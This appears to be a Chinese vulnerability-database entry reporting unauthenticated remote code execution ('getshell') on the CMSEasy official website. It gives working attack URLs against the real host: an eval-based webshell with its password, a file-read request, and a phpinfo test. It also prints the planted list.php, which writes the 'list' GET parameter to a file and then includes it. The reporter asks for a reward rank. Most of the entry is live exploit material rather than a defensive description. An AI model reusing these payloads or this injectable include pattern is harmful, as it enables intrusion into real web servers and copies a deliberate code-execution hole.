cmseasy官网无条件getshell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: CMS官网 无条件getshell 想走个大场商 求20rank ### 详细说明: 首先先看webshell 要不直接把我的webshell给覆盖掉了 菜刀地址 http://www.cmseasy.cn/post/list.php?list=@eval%28$_POST[%27a%27]%29; 密码a [<img src="https://images.seebug.org/upload/201511/022141252ffb7b421ea03d440417e9de5e06ce48.png" alt="22222222222222222222222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/022141252ffb7b421ea03d440417e9de5e06ce48.png) ### 漏洞证明: view-source:http://www.cmseasy.cn/post/list.php?list=echo%20file_get_contents(%27list.php%27); ``` <?php /* * *文章列表生成文件 */ if(isset($_GET['list'])){ mud(); } function mud(){ $fp=fopen('content_batch_stye.html','w'); file_put_contents('content_batch_stye.html',"<?php\r\n"); file_put_contents('content_batch_stye.html',$_GET['list'],FILE_APPEND); fclose($fp); require 'content_batch_stye.html';} ?> ``` ``` http://www.cmseasy.cn/post/list.php?list=phpinfo(); ``` [<img...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息